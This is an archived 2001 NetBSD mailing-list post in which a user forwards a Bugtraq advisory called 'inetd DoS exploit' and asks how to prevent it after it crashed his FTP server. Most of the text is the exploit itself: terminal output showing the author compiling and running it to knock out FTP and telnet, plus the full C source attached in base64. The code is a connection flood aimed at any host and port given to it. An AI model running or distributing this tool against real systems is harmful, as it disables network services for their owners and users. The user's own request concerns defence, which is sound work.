Subject: Fwd: inetd DoS exploit
To: None <netbsd-users@netbsd.org>
From: Emre Yildirim <emre@srengineering.com>
List: netbsd-users
Date: 02/26/2001 16:44:21
--------------Boundary-00=_X5ZDYRQBHJNVXJFYWE1J
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
I got this in the mail today.
Is there a way to fix/prevent this?
(it killed my ftp server, NetBSD 1.5S)
---------- Forwarded Message ----------
Subject: inetd DoS exploit
Date: Sun, 25 Feb 2001 19:26:07 +0300
From: "Serega[linux]" <linux@IHGROUP.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Name: inetd DoS exploit
Author: Serega[Linux]
[ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner */
Open ports on [127.0.0.1]
-----------------------------
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb
17 15:10:44 MSK 2001) ready. [23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25
Feb 2001 18:58:36 +0300 -----------------------------
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44
MSK 2001) ready.
[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 127.0.0.1 21
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
login:
[ser@ihg prog]$ ./inetddos 127.0.0.1 23
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
--
/*
* mailto:linux@ihgroup.ru
* ICQ: 64432299
* Home Page: http://127.0.0.1
*/
-------------------------------------------------------
--------------Boundary-00=_X5ZDYRQBHJNVXJFYWE1J
Content-Type: text/x-c;
name="inetddos.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="inetddos.c"
LyoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpJbmV0ZCBEb1MgZXhwbG9pdCBi
WSBTZXJlZ2FbTGludXhdCklIRyBQcm9qZWN0IHd3dy5paGdyb3VwLnJ1Cm1haWx0bzpsaW51eEBp
aGdyb3VwLnJ1Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KClVzYWdlOiAuL2lu
ZXRkZG9zIDxob3N0PiA8cG9ydD4KCmV4YW1wbGU6Cgpbc2VyQGloZyBwcm9nXSQgLi9wc2NhbmVy
IC1oIDEyNy4wLjAuMQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpPcGVuIHBvcnRzIG9u
IFsxMjcuMC4wLjFdClsyMV0gT1BFTiA6IDIyMCBpaGcubG9jYWxob3N0IEZUUCBzZXJ2ZXIgKFZl
cnNpb24gd3UtNi42LjYoNSkgU2F0IEZlYiAxNyAxNToxMDo0NCBNU0sgMjAwMSkgcmVhZHkuClsy
M10gT1BFTiA6ClsyNV0gT1BFTiA6IDIyMCBpaGcubG9jYWxob3N0IEVTTVRQIFNlbmRtYWlsIDgu
MTEuMC84LjExLjA7IFN1biwgMjUgRmViIDIwMDEgMTg6NTg6MzYgKzAzMDAKLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0KCltzZXJAaWhnIHByb2ddJCB0ZWxuZXQgMTI3LjAuMC4xIDIxClRy
eWluZyAxMjcuMC4wLjEuLi4KQ29ubmVjdGVkIHRvIDEyNy4wLjAuMS4KRXNjYXBlIGNoYXJhY3Rl
ciBpcyAnXl0nLgoyMjAgaWhnLmxvY2FsaG9zdCBGVFAgc2VydmVyIChWZXJzaW9uIHd1LTYuNi42
KDUpIFNhdCBGZWIgMTcgMTU6MTA6NDQgTVNLIDIwMDEpIHJlYWR5LgoKW3NlckBpaGcgcHJvZ10k
IGNjIGluZXRkZG9zLmMgLW8gaW5ldGRkb3MKW3NlckBpaGcgcHJvZ10kIC4vaW5ldGRkb3MgMTI3
LjAuMC4xIDIxCkRvUyBPSwpbc2VyQGloZyBwcm9nXSQgdGVsbmV0IDEyNy4wLjAuMSAyMQpUcnlp
bmcgMTI3LjAuMC4xLi4uCnRlbG5ldDogVW5hYmxlIHRvIGNvbm5lY3QgdG8gcmVtb3RlIGhvc3Q6
IENvbm5lY3Rpb24gcmVmdXNlZApbc2VyQGloZyBwcm9nXSQgdGVsbmV0IDEyNy4wLjAuMSAyMwpU
cnlpbmcgMTI3LjAuMC4xLi4uCkNvbm5lY3RlZCB0byAxMjcuMC4wLjEuCkVzY2FwZSBjaGFyYWN0
ZXIgaXMgJ15dJy4KbG9naW46Cgpbc2VyQGloZyBwcm9nXSQgLi9pbmV0ZGRvcyAxMjcuMC4wLjEg
MjMKRG9TIE9LCltzZXJAaWhnIHByb2ddJCB0ZWxuZXQgMTI3LjAuMC4xIDIzClRyeWluZyAxMjcu
MC4wLjEuLi4KdGVsbmV0OiBVbmFibGUgdG8gY29ubmVjdCB0byByZW1vdGUgaG9zdDogQ29ubmVj
dGlvbiByZWZ1c2VkCgoqLwoKCiNpbmNsdWRlIDxuZXRkYi5oPgojaW5jbHVkZSA8bmV0aW5ldC9p
bi5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNs
dWRlIDx0aW1lLmg+CiNpbmNsdWRlIDxzaWduYWwuaD4KCgp2b2lkIHRpbWVfb3V0KGludCBzaWcp
OwppbnQgdGltZW91dD01OyAgCQpjaGFyIGxvZ29bNTEyXTsKaW50IHNvY2tmZDsKCkRvUyAoY2hh
ciAqaG9zdCwgaW50IHBvcnQpCnsKdW5zaWduZWQgbG9uZyBpbnQgaXBfYWRkcjsKc3RydWN0IHNv
Y2thZGRyX2luIHNlcnY7CgoKc3RydWN0IGhvc3RlbnQgKmg7CnVuc2lnbmVkIGxvbmcgaW50IHJ2
OwpzZXJ2LnNpbl9mYW1pbHkgPSBBRl9JTkVUOwppZiAoKGg9Z2V0aG9zdGJ5bmFtZShob3N0KSkg
PT0gTlVMTCkKCXsKCWNsb3NlKHNvY2tmZCk7CglwZXJyb3IoaG9zdCk7CglleGl0KDEpOwoJfQoK
ICAgaWYoaCE9TlVMTCkKbWVtY3B5KCZydixoLT5oX2FkZHIsaC0+aF9sZW5ndGgpOwogICBlbHNl
CiAgIHJ2PWluZXRfYWRkcihob3N0KTsKc2Vydi5zaW5fYWRkci5zX2FkZHIgPSBydjsKc2Vydi5z
aW5fcG9ydCA9IGh0b25zKHBvcnQpOwoKaWYgKChzb2NrZmQgPSBzb2NrZXQgKEFGX0lORVQsIFNP
Q0tfU1RSRUFNLCAwKSkgPT0gLTEpCiAgICB7CiAgICBwZXJyb3IgKCJzb2NrZXQgZXJyb3IiKTsK
ICAgIGV4aXQoMSk7CiAgICB9CgphbGFybSh0aW1lb3V0KTsKc2lnbmFsKFNJR0FMUk0sICh2b2lk
ICopJnRpbWVfb3V0KTsKCmlmIChjb25uZWN0IChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIqKSZz
ZXJ2LCBzaXplb2Yoc2VydikpICE9IDApCgl7CgljbG9zZShzb2NrZmQpOwoJcGVycm9yKGhvc3Qp
OwoJZXhpdCgxKTsKCX0KCmFsYXJtKDApOwpjbG9zZShzb2NrZmQpOwpyZXR1cm4oMSk7Cn0KCgoK
dm9pZCB0aW1lX291dCAoaW50IHNpZykKewoJY2xvc2Uoc29ja2ZkKTsKCXByaW50ZigidGltZW91
dFxuIik7CglleGl0KC0xKTsKfQoKCnVzYWdlKGNoYXIgKmgpCnsKcHJpbnRmKCItLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG5JbmV0ZCBEb1MgZXhwbG9pdCBiWSBTZXJlZ2FbTGlu
dXhdCklIRyBQcm9qZWN0IHd3dy5paGdyb3VwLnJ1Cm1haWx0bzpsaW51eEBpaGdyb3VwLnJ1XG4t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iKTsKcHJpbnRmKCJcblVzYWdlOiAl
cyA8aG9zdD4gPHBvcnQ+XG5cbiIsIGgpOwpleGl0KDEpOwp9CgoKbWFpbihpbnQgYXJnYywgY2hh
ciAqKmFyZ3YpCnsKaW50IGk7CmlmIChhcmdjPDMpIHVzYWdlKGFyZ3ZbMF0pOwoKZm9yIChpPTE7
IGk8MTAwMDsgaSsrKQpEb1MoYXJndlsxXSwgYXRvaShhcmd2WzJdKSk7CnByaW50ZigiRG9TIGZh
aWxlZFxuIik7Cgp9
--------------Boundary-00=_X5ZDYRQBHJNVXJFYWE1J--